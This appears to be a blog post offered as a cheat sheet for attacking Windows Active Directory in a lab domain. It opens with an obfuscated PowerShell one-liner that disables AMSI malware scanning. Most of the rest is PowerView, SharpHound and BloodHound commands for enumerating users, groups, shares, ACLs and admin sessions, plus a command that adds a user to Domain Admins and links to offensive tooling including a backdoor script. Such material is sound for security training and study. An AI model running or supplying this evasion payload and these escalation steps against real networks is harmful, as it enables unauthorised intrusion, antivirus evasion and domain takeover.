429 words
2 minutes
Windows AD Domain Enumeration
User Enumeration
bypass AMSI
powershell -ep bypassSET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )Download powerview
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
import .\Powerview.ps1Get a list of users in the current domain
Get-DomainUserGet-DomainUser -Name student1Find User Accounts used as Service Accounts
Get-DomainUser -SPNGet list of all properties for users in the current domain
Get-DomainUser -Properties pwdlastsetGet-DomainUser -Properties badpwdcountGet-DomainUser -Properties lastlogonGet-DomainUser -Properties descriptionGet-DomainUser -Properties samaccountname,descriptionall enabled users, returning distinguishednames
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishednameall disabled users
Get-DomainUser -UACFilter ACCOUNTDISABLEDomain Group Enumeration
Get all the groups in the current domain
Get-DomainGroupGet-DomainGroupMember -Name "Domain Admins"Get-DomainGroup -Domain <targetdomain>Get-DomainGroupMember -Name "Domain Admins" -RecurseGet all the members of the Domain Admins group
Get-NetGroupMember -GroupName "Domain Admins"Get-NetGroupMember -GroupName "Domain Admins" -RecurseGet-DomainOUGet-NetGroupMember -GroupName "Enterprise Admins" -Domain <DOmain name here>Get the group membership for a user:
Get-DomainGroup -UserName "student1"Domain Computer Enumeration
enumerates computers in the current domain with ‘outlier’ properties, i.e. properties not set from the forest result returned by Get-DomainComputer
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlierGet-DomainComputerGet-DomainComputer -OperatingSystem "*Server 2016*"Get-DomainComputer -PingGet-DomainComputer -Name "Student.pentesting.local"GPO and OU Enumeration
A Group Policy Object (GPO) is a virtual collection of policy settings. A GPO has a unique name, such as a GUID.
Get-DomainGPOGet-DomainGPO | Select displaynameGet-DomainGPO -ComputerName student/ad/dc/web.pentesting.localGet machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -UserName student1 -VerboseGet-domainenumerate all gobal catalogs in the forest
Get-ForestGlobalCatalogGet OUs in a domain
Get-DomainOUGet GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU
Get-DomainGPOGet-DomainGPO -Name "{AB306569-220D-43FF-B03B83E8F4EF8081}"File Shares Enumeration
Find shares on hosts in current domain.
Find-DomainShare -Verbosecd \\fileshare.pentesting.local\FileSharenslookup.exe ad.pentesting.localFind Non Standard Shares
Find-DomainShare -Verbose -ExcludeStandard -ExcludeIPC -ExcludePrintFind sensitive files on computers in the domain
Invoke-FileFinder -VerboseGet all fileservers of the domain
Get-DomainFileServer -VerboseIntro to ACL
Get the ACLs associated with the specified object
Get-ObjectAcl -SamAccountName student1 -ResolveGUIDsGenericWrite for all users > under advanced > Write all properties
Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericWrite') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }Add user to domain admin
net user student1 /domain;Add-DomainGroupMember -Identity 'Domain Admins' -Members 'student1' -Domain "pentesting";net user student1 /domainActive Directory Recon
Github : sens-of-security/ADRecon.ps1
BloodHound
Download Bloodhound GUI
Download Neoj4
Download SharpHound
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors
powershell -ep bypassimport-module .\SharpHound.ps1Invoke-BloodHound -CollectionMethod All -Verbose -Domain pentestingUser Hunting Domain Enumeration
Find all machines on the current domain where the current user has local admin access
Test-AdminAccess -VerboseTools
- https://raw.githubusercontent.com/admin0987654321/admin1/master/Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess.ps1- https://github.com/samratashok/nishang/blob/master/Backdoors/Set-RemotePSRemoting.ps1
FindPSRemotingLocalAdminAccess.ps1
Find local admins on all machines of the domain
(needs administrator privs on non-dc machines).
Find-DomainLocalGroupMember -VerboseFind computers where a domain admin (or specified user/group) has sessions:
Find-DomainUserLocationFind-DomainUserLocation -GroupName "RDPUsers"To confirm admin access
Invoke-Command -ComputerName dc -ScriptBlock{whoami}Enter-PSSession -ComputerName dcFind-DomainUserLocation -CheckAccessFind computers where a domain admin is logged-in.
Find-DomainUserLocation -Stealth Windows AD Domain Enumeration
https://zakariaf.vercel.app/posts/ad2/